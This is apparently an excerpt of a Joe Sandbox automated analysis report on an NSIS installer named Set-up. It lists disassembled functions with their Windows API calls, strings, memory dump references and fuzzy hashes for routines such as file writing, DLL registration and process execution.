                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3734993849-3206598305
                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                    Strings
                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                    • String ID: created uninstaller: %d, "%s"
                                                                    • API String ID: 3294113728-3145124454
                                                                    • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                    • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                    Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004246CD,74DF23A0,00000000), ref: 00404FD6
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FE6
                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FF9
                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                    Strings
                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                    • `G, xrefs: 0040246E
                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                    • API String ID: 1033533793-4193110038
                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                    Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004246CD,74DF23A0,00000000), ref: 00404FD6
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FE6
                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FF9
                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                    Strings
                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                    • Exec: command="%s", xrefs: 00402241
                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                    • API String ID: 2014279497-3433828417
                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                    Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                    • MulDiv.KERNEL32(00054000,00000064,04601F04), ref: 00403295
                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                    Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: FreeGloballstrcpyn
                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                    • API String ID: 1459762280-1711415406
                                                                    • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                    • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Close$DeleteEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1912718029-0
                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                    • String ID:
                                                                    • API String ID: 3376005127-0
                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2568930968-0
